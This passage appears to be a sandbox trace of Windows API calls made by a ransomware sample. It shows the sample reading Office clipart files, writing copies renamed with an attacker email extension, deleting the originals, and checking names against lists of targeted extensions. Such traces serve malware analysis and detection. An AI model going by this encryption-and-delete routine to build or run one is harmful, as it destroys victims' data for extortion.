files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.371] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.371] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.372] GetLastError () returned 0x0 [0053.372] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x47a, lpOverlapped=0x0) returned 1 [0053.383] WriteFile (in: hFile=0x1c0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x480, lpOverlapped=0x0) returned 1 [0053.384] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.384] WriteFile (in: hFile=0x1c0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.384] SetEndOfFile (hFile=0x1c0) returned 1 [0053.385] CloseHandle (hObject=0x1c0) returned 1 [0053.385] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.385] SetEndOfFile (hFile=0x1bc) returned 1 [0053.386] CloseHandle (hObject=0x1bc) returned 1 [0053.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0053.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString=".doc") returned 4 [0053.422] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.422] lstrlenW (lpString=".docx") returned 5 [0053.422] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.422] lstrlenW (lpString=".pdf") returned 4 [0053.422] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.422] lstrlenW (lpString=".xls") returned 4 [0053.422] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.422] lstrlenW (lpString=".xlsx") returned 5 [0053.422] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.422] lstrlenW (lpString=".ppt") returned 4 [0053.422] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString=".zip") returned 4 [0053.422] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.422] lstrlenW (lpString=".rar") returned 4 [0053.422] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.422] lstrlenW (lpString=".bz2") returned 4 [0053.422] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.422] lstrlenW (lpString=".7z") returned 3 [0053.422] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString=".dbf") returned 4 [0053.422] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString=".1cd") returned 4 [0053.422] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0053.422] lstrlenW (lpString=".jpg") returned 4 [0053.423] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.423] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.423] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.423] GetLastError () returned 0x0 [0053.423] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1398, lpOverlapped=0x0) returned 1 [0053.431] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x13a0, lpOverlapped=0x0) returned 1 [0053.433] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.433] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.433] SetEndOfFile (hFile=0x220) returned 1 [0053.433] CloseHandle (hObject=0x220) returned 1 [0053.433] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.433] SetEndOfFile (hFile=0x1c0) returned 1 [0053.434] CloseHandle (hObject=0x1c0) returned 1 [0053.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".doc") returned 4 [0053.435] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString=".docx") returned 5 [0053.435] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.435] lstrlenW (lpString=".pdf") returned 4 [0053.435] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".xls") returned 4 [0053.435] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".xlsx") returned 5 [0053.435] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.435] lstrlenW (lpString=".ppt") returned 4 [0053.435] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".zip") returned 4 [0053.435] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".rar") returned 4 [0053.435] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".bz2") returned 4 [0053.435] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString=".7z") returned 3 [0053.435] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".dbf") returned 4 [0053.435] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".1cd") returned 4 [0053.435] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".jpg") returned 4 [0053.435] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.436] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3966) returned 1 [0053.436] CloseHandle (hObject=0x1c0) returned 1 [0053.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 0x20 [0053.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.436] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.436] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.436] GetLastError () returned 0x0 [0053.437] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xf7e, lpOverlapped=0x0) returned 1 [0053.438] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0053.439] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.439] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.439] SetEndOfFile (hFile=0x220) returned 1 [0053.439] CloseHandle (hObject=0x220) returned 1 [0053.440] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.440] SetEndOfFile (hFile=0x1c0) returned 1 [0053.440] CloseHandle (hObject=0x1c0) returned 1 [0053.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString=".doc") returned 4 [0053.441] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.441] lstrlenW (lpString=".docx") returned 5 [0053.441] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.441] lstrlenW (lpString=".pdf") returned 4 [0053.441] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.441] lstrlenW (lpString=".xls") returned 4 [0053.441] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.441] lstrlenW (lpString=".xlsx") returned 5 [0053.441] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.441] lstrlenW (lpString=".ppt") returned 4 [0053.441] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString=".zip") returned 4 [0053.441] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.441] lstrlenW (lpString=".rar") returned 4 [0053.441] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.441] lstrlenW (lpString=".bz2") returned 4 [0053.441] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.442] lstrlenW (lpString=".7z") returned 3 [0053.442] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.442] lstrlenW (lpString=".dbf") returned 4 [0053.442] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.442] lstrlenW (lpString=".1cd") returned 4 [0053.442] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.442] lstrlenW (lpString=".jpg") returned 4 [0053.442] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.442] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3378) returned 1 [0053.442] CloseHandle (hObject=0x1c0) returned 1 [0053.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 0x20 [0053.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.443] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.443] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.443] GetLastError () returned 0x0 [0053.443] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xd32, lpOverlapped=0x0) returned 1 [0053.444] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xd40, lpOverlapped=0x0) returned 1 [0053.445] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.445] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.445] SetEndOfFile (hFile=0x220) returned 1 [0053.445] CloseHandle (hObject=0x220) returned 1 [0053.446] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.446] SetEndOfFile (hFile=0x1c0) returned 1 [0053.446] CloseHandle (hObject=0x1c0) returned 1 [0053.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.447] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0053.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString=".doc") returned 4 [0053.447] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.447] lstrlenW (lpString=".docx") returned 5 [0053.447] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.447] lstrlenW (lpString=".pdf") returned 4 [0053.447] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.448] lstrlenW (lpString=".xls") returned 4 [0053.448] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.448] lstrlenW (lpString=".xlsx") returned 5 [0053.448] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.448] lstrlenW (lpString=".ppt") returned 4 [0053.448] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.448] lstrlenW (lpString=".zip") returned 4 [0053.448] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.448] lstrlenW (lpString=".rar") returned 4 [0053.448] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.448] lstrlenW (lpString=".bz2") returned 4 [0053.448] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.448] lstrlenW (lpString=".7z") returned 3 [0053.448] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.448] lstrlenW (lpString=".dbf") returned 4 [0053.448] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.448] lstrlenW (lpString=".1cd") returned 4 [0053.448] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.448] lstrlenW (lpString=".jpg") returned 4 [0053.448] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.449] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3120) returned 1 [0053.449] CloseHandle (hObject=0x1c0) returned 1 [0053.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 0x20 [0053.449] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.449] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.449] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.449] GetLastError () returned 0x0 [0053.450] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xc30, lpOverlapped=0x0) returned 1 [0053.451] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xc40, lpOverlapped=0x0) returned 1 [0053.452] ReadFile (in: hFile=0x1c0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.452] WriteFile (in: hFile=0x220, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.452] SetEndOfFile (hFile=0x220) returned 1 [0053.452] CloseHandle (hObject=0x220) returned 1 [0053.452] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.452] SetEndOfFile (hFile=0x1c0) returned 1 [0053.453] CloseHandle (hObject=0x1c0) returned 1 [0053.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0053.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.453] lstrlenW (lpString=".doc") returned 4 [0053.453] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.453] lstrlenW (lpString=".docx") returned 5 [0053.454] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.454] lstrlenW (lpString=".pdf") returned 4 [0053.454] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.454] lstrlenW (lpString=".xls") returned 4 [0053.454] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.454] lstrlenW (lpString=".xlsx") returned 5 [0053.454] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.454] lstrlenW (lpString=".ppt") returned 4 [0053.454] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 